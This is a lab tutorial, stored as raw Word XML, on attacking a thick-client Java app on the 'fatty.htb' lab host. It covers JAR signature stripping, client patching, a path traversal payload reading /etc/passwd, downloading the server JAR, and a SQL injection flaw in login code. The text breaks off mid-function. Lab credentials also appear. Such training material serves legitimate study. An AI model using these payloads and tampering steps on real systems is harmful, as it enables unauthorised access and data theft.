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5123" w14:textId="77777777" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE73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Exploiting Web Vulnerabilities in Thick-Client Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B9105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30BC676C">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3377367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Thick client applications with a three-tier architecture have a security advantage over those with a two-tier architecture since it prevents the end-user from communicating directly with the database server. However, three-tier applications can be susceptible to web-specific attacks like SQL Injection and Path Traversal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7188A2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During penetration testing, it is common for someone to encounter a thick client application that connects to a server to communicate with the database. The following scenario demonstrates a case where the tester has found the following files while enumerating an FTP server that provides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anonymous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user access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4193B666" w14:textId="77777777" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE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fatty-client.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC93128" w14:textId="77777777" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE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note.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736FBE05" w14:textId="77777777" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE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note2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D9B4A3" w14:textId="77777777" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE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note3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF39D91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Reading the content of all the text files reveals that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF0A109" w14:textId="77777777" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE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 server has been reconfigured to run on port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1337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instead of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8000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005EBC8D" w14:textId="77777777" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE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This might be a thick/thin client architecture where the client application still needs to be updated to use the new port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D741E60" w14:textId="77777777" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE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client application relies on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Java 8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7ABE28B5" w14:textId="77777777" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE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login credentials for login in the client application are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qtc / clarabibi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6C2C9C31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run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by double-clicking on it. Once the app is started, we can log in using the credentials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qtc / clarabibi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0670E822" w14:textId="69D8F2B5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46D85966" wp14:editId="39F0E6F4">
            <wp:extent cx="5731510" cy="3576320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1491412875" name="Picture 17" descr="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1C38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is not successful, and the message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Connection Error!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displayed. This is probably because the port pointing to the servers needs to be updated from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8000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1337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Let's capture and analyze the network traffic using Wireshark to confirm this. Once Wireshark is started, we click on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Login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once again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F56F35" w14:textId="453147AF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74EA7C9C" wp14:editId="522088EA">
            <wp:extent cx="5731510" cy="706755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1996900837" name="Picture 16" descr="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sh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F615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client attempts to connect to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server.fatty.htb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subdomain. Let's start a command prompt as administrator and add the following entry to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/etc/hosts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file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568557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echo 10.10.10.174    server.fatty.htb &gt;&gt; C:\Windows\System32\drivers\etc\hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA3041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Inspecting the traffic again reveals that the client is attempting to connect to port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8000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6EE145CA" w14:textId="525D85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62BB75B7" wp14:editId="200DF42F">
            <wp:extent cx="5731510" cy="1469390"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1750192735" name="Picture 15" descr="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93F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 Java Archive file, and its content can be extracted by right-clicking on it and selecting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Extract files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DE9E142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ls fatty-client\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507385FB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7AE7C25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2816E9A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Mode                LastWriteTime         Length Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120F980C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                -------------         ------ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B48C40C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d-----       10/30/2019  12:10 PM                htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3195E95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d-----       10/30/2019  12:10 PM                META-INF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F254E2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d-----        4/26/2017  12:09 AM                org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3533F3B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10/30/2019  12:10 PM           1550 beans.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2519097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10/30/2019  12:10 PM           2230 exit.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8C381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10/30/2019  12:10 PM           4317 fatty.p12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A500CB1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10/30/2019  12:10 PM            831 log4j.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C03A95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 4/26/2017  12:08 AM            299 module-info.class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2384033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    10/30/2019  12:10 PM          41645 spring-beans-3.0.xsd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7C069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run PowerShell as administrator, navigate to the extracted directory and use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Select-String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command to search all the files for port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8000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2315656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ls fatty-client\ -recurse | Select-String "8000" | Select Path, LineNumber | Format-List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E03A7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632FF8D0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Path       : C:\Users\cybervaca\Desktop\fatty-client\beans.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426940FE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LineNumber : 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEF2CA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There's a match in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beans.xml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This is a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Spring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configuration file containing configuration metadata. Let's read its content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249127D0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cat fatty-client\beans.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB116EC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77C95D0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0303F61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&lt;!-- Here we have an constructor based injection, where Spring injects required arguments inside the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A03E07D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     constructor function. --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C7EDFD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&lt;bean id="connectionContext" class = "htb.fatty.shared.connection.ConnectionContext"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E01AD78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  &lt;constructor-arg index="0" value = "server.fatty.htb"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6168B50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  &lt;constructor-arg index="1" value = "8000"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F59E9E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&lt;/bean&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D2DB67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2137ED9D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&lt;!-- The next to beans use setter injection. For this kind of injection one needs to define an default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A368CA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constructor for the object (no arguments) and one needs to define setter methods for the properties. --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF7F58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&lt;bean id="trustedFatty" class = "htb.fatty.shared.connection.TrustedFatty"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F934ED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  &lt;property name = "keystorePath" value = "fatty.p12"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7143EE7C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&lt;/bean&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5620F23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48F95331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&lt;bean id="secretHolder" class = "htb.fatty.shared.connection.SecretHolder"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF95A8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  &lt;property name = "secret" value = "clarabibiclarabibiclarabibi"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C123A0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&lt;/bean&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224890E8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54EBEBDF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Let's edit the line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&lt;constructor-arg index="1" value = "8000"/&gt;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set the port to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1337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Reading the content carefully, we also notice that the value of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secret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clarabibiclarabibiclarabibi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Running the edited application will fail due to an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SHA-256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digest mismatch. The JAR is signed, validating every file's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SHA-256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hashes before running. These hashes are present in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META-INF/MANIFEST.MF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79C4B0C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cat fatty-client\META-INF\MANIFEST.MF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BFFD7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256CB43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Manifest-Version: 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5649D1CE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Archiver-Version: Plexus Archiver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6902BE6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Built-By: root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294F44D8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Sealed: True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6110DA9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Created-By: Apache Maven 3.3.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA002E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Build-Jdk: 1.8.0_232</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9BCBB5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Main-Class: htb.fatty.client.run.Starter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E2A14A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2B52791D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Name: META-INF/maven/org.slf4j/slf4j-log4j12/pom.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FD103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SHA-256-Digest: miPHJ+Y50c4aqIcmsko7Z/hdj03XNhHx3C/pZbEp4Cw=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2864278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254C8709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Name: org/springframework/jmx/export/metadata/ManagedOperationParamete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E531D3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r.class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB51F0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SHA-256-Digest: h+JmFJqj0MnFbvd+LoFffOtcKcpbf/FD9h2AMOntcgw=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617526CA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665DF0E4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remove the hashes from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META-INF/MANIFEST.MF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delete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1.RSA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1.SF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files from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META-INF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directory. The modified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MANIFEST.MF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should end with a new line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEF4F0B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txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B8284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Manifest-Version: 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEDBFA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Archiver-Version: Plexus Archiver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDE225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Built-By: root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD73D3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Sealed: True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35534A6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Created-By: Apache Maven 3.3.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5759535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Build-Jdk: 1.8.0_232</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DE095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Main-Class: htb.fatty.client.run.Starter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191A24C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B02BB85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update and run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by issuing the following commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E09822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cd .\fatty-client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3940BF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jar -cmf .\META-INF\MANIFEST.MF ..\fatty-client-new.jar *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6875A48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Then, we double-click on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to start it and try logging in using the credentials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qtc / clarabibi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04365B71" w14:textId="061F4F48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4C9FCFDC" wp14:editId="0FF005E8">
            <wp:extent cx="5731510" cy="3746500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="2053480465" name="Picture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A397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time we get the message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Login Successful!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2DB6B1C5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29F617B8">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CEAB35" w14:textId="77777777" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE7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Foothold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178AE58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Clicking on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Profile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-&gt;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Whoami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reveals that the user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qtc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assigned with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role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46941448" w14:textId="43EB4816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60F8BDCA" wp14:editId="2709F43B">
            <wp:extent cx="5731510" cy="756920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1793204370" name="Picture 13" descr="pro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il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D663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Clicking on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ServerStatus,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we notice that we can't click on any options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5F71B4" w14:textId="0B4145F6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4195E751" wp14:editId="4D2E7B69">
            <wp:extent cx="5731510" cy="808355"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="489532787" name="Picture 12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C2C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implies that there might be another user with higher privileges that is allowed to use this feature. Clicking on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FileBrowser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-&gt;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Notes.txt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reveals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security.txt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Clicking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option at the bottom of the window shows the following content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D25BEF" w14:textId="7F1A8B5D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2ED7EEB6" wp14:editId="535BAD77">
            <wp:extent cx="5731510" cy="742950"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="857267855" name="Picture 11" descr="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cu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9B2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note informs us that a few critical issues in the application still need to be fixed. Navigating to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FileBrowser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-&gt;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Mail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option reveals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dave.txt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containing interesting information. We can read its content by clicking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option at the bottom of the window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D69511" w14:textId="08A52355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2CED7F41" wp14:editId="739DD299">
            <wp:extent cx="5731510" cy="1305560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="341229482" name="Picture 10" descr="d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BD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message from dave says that all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admin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users are removed from the database. It also refers to a timeout implemented in the login procedure to mitigate time-based SQL injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15992966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2E37B0DD">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD5E162" w14:textId="77777777" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE7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Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B34305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Since we can read files, let's attempt a path traversal attack by giving the following payload in the field and clicking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button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2F34DF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txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0C42D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../../../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636D77FD" w14:textId="2F0AD5AC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2988D65E" wp14:editId="0342A6EF">
            <wp:extent cx="5731510" cy="673735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1858406422" name="Picture 9" descr="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ssw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1A18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server filters out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/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character from the input. Let's decompile the application using </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00FE73D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JD-GUI</w:t>
        </w:r>
      </w:hyperlink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by dragging and dropping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onto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jd-gui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4730E38" w14:textId="18AF0BC4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0194A3F4" wp14:editId="4C9C066B">
            <wp:extent cx="5731510" cy="1653540"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="660647918" name="Picture 8" descr="jd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dgu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4BC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Save the source code by pressing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Save All Sources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option in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jdgui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Decompress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fatty-client-new.jar.src.zip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by right-clicking and selecting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Extract files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fatty-client-new.jar.src/htb/fatty/client/methods/Invoker.java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handles the application features. Reading its content reveals the following code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29696F3B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4CDD050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String showFiles(String folder) throws MessageParseException, MessageBuildException, IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561681C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String methodName = (new Object() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387EB8B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708222F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}).getClass().getEnclosingMethod().getName();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B855F8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logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AEEEF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(AccessCheck.checkAccess(methodName, this.user))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1011B48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return "Error: Method '" + methodName + "' is not allowed for this user account"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12464C4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this.action = new ActionMessage(this.sessionID, "files");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE8CEA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this.action.addArgument(folder);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574BCEF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sendAndRecv();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12503A8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(this.response.hasError())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE1B0C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return "Error: Your action caused an error on the application server!"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F48499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return this.response.getContentAsString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033C0AA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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3170CE75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showFiles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 takes in one argument for the folder name and then sends the data to the server using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sendAndRecv()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call.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fatty-client-new.jar.src/htb/fatty/client/gui/ClientGuiTest.java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sets the folder option. Let's read its content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAD1DAC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3F581EA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configs.addActionListener(new ActionListener() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329DF93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public void actionPerformed(ActionEvent e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D899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String response = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1243656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ClientGuiTest.this.currentFolder = "configs";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E96FA3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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4109CDD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  response = ClientGuiTest.this.invoker.showFiles("configs");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302BBF3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} catch (MessageBuildException|htb.fatty.shared.message.MessageParseException e1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1952E38B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  JOptionPane.showMessageDialog(controlPanel, "Failure during message building/parsing.", "Error", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0011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} catch (IOException e2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6165E48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  JOptionPane.showMessageDialog(controlPanel, "Unable to contact the server. If this problem remains, please close and reopen the client.", "Error", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFC285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 xml:space="preserve">            } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A3842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 textPane.setText(response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C11355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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B372EE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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0F430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replace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configs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folder name with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..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as follows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478B987F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51660D0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ClientGuiTest.this.currentFolder = "..";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530E13DD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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1CF51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response = ClientGuiTest.this.invoker.showFiles("..");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F2DA68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Next, compile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ClientGuiTest.Java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file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB18EF6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javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\client\gui\ClientGuiTest.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C662A2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generates several class files. Let's create a new folder and extract the contents of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into it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC2D6F1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mkdir raw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BC9937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cp fatty-client-new.jar raw\fatty-client-new-2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4EBFA1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Navigate to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raw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directory and decompress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fatty-client-new-2.jar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by right-clicking and selecting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Extract Here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Overwrite any existing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htb/fatty/client/gui/*.class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files with updated class files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141A4581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mv -Force fatty-client-new.jar.src\htb\fatty\client\gui\*.class raw\htb\fatty\client\gui\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE91A50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Finally, we build the new JAR file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA34E98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cd raw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170B0DC4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jar -cmf META-INF\MANIFEST.MF traverse.jar .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1BC4F0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log in to the application and navigate to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FileBrowser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-&gt;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Config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option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5EEF86" w14:textId="0D3F25EF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3E6265E9" wp14:editId="259CD90A">
            <wp:extent cx="5731510" cy="981710"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="540482040" name="Picture 7" descr="tr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aver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B45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is successful. We can now see the content of the directory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configs/../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The files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start.sh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look interesting. Listing the content of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start.sh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reveals that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running inside an Alpine Docker container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036DF3C1" w14:textId="5389DC7C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5FEC842B" wp14:editId="20EA31EC">
            <wp:extent cx="5731510" cy="2105660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="285561353" name="Picture 6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E28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modify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 in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fatty-client-new.jar.src/htb/fatty/client/methods/Invoker.java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download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as follows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FBC783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6621BE5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import java.io.FileOutputStream;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378FC99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2235E30D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String open(String foldername, String filename) throws MessageParseException, MessageBuildException, IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085435DB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String methodName = (new Object() {}).getClass().getEnclosingMethod().getName();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A2B4A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logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F936F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(AccessCheck.checkAccess(methodName, this.user)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BDB84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return "Error: Method '" + methodName + "' is not allowed for this user account";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515472C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC54D4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this.action = new ActionMessage(this.sessionID, "open");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F33AEE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this.action.addArgument(foldername);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCADB7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this.action.addArgument(filename);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D53545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sendAndRecv();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D7E9E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String desktopPath = System.getProperty("user.home") + "\\Desktop\\fatty-server.jar";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4634D0E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FileOutputStream fos = new FileOutputStream(desktopPath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7340130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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C26C1D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if (this.response.hasError()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E74E4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return "Error: Your action caused an error on the application server!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B2559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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658AD91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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB874D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byte[] content = this.response.getContent();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167629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fos.write(content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663E898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fos.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082E18B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B77122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return "Successfully saved the file to " + desktopPath;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52011F3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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1016625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45C828CE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Rebuild the JAR file by following the same steps and log in again to the application. Then, navigate to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FileBrowser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-&gt;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Config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add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name in the input field, and click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Open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button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD24852" w14:textId="010FB6BF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0F9759D7" wp14:editId="7577694D">
            <wp:extent cx="5731510" cy="557530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1876967689" name="Picture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wnlo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154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is successfully downloaded onto our desktop, and we can start the examination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CA3E8E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C:\&gt; ls C:\Users\cybervaca\Desktop\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CE9BAA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76368692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...SNIP...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D589A0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Mode                LastWriteTime         Length Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0D78E5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                -------------         ------ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E3C4C1" w14:textId="77777777" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE73D7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-a----        3/25/2023  11:38 AM       10827452 fatty-server.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FFF89A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3C5E3604">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F119A5" w14:textId="77777777" w:rsidR="00FE73D7" w:rsidRPr="00FE73D7" w:rsidRDefault="00FE73D7" w:rsidP="00FE7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SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30717F6C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Decompiling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fatty-server.jar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using JD-GUI reveals the file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htb/fatty/server/database/FattyDbSession.class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that contains a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checkLogin()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 that handles the login functionality. This function retrieves user details based on the provided username. It then compares the retrieved password with the provided password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3219B8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5611664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User checkLogin(User user) throws LoginException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748CD79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&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A372E4B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rs = stmt.executeQuery("SELECT id,username,email,password,role FROM users WHERE username='" + user.getUsername() + "'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F7D1E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&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3B8E6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if (newUser.getPassword().equalsIgnoreCase(user.getPassword()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D24A2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return newUser; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C737A1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throw new LoginException("Wrong Password!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651F4F2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&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2C1E4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   this.logger.logError("[-] Failure with SQL query: ==&gt; SELECT id,username,email,password,role FROM users WHERE username='" + user.getUsername() + "' &lt;==");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2092497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this.logger.logError("[-] Exception was: '" + e.getMessage() + "'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2719DCC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return null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2638C4F9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check how the client application sends credentials to the server. The login button creates the new object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ClientGuiTest.this.user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for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class. It then calls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setUsername()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setPassword()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functions with the respective username and password values. The values that are returned from these functions are then sent to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE93AC7" w14:textId="0984FD06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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="054B180A" wp14:editId="5DE73264">
            <wp:extent cx="5731510" cy="1864360"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="2070394072" name="Picture 4" descr="logi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in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D89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check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setUsername()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setPassword()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functions from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htb/fatty/client/shared/resources/user.java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3A01A25F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6BBEF2F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void setUsername(String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177C19D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this.username = username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF82FC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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624E145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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686E99F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public void setPassword(String password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7616064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String hashString = this.username + password + "clarabibimakeseverythingsecure";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FABDC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MessageDigest digest = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F50921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try {</w:t>
      </w:r>
    </w:p>
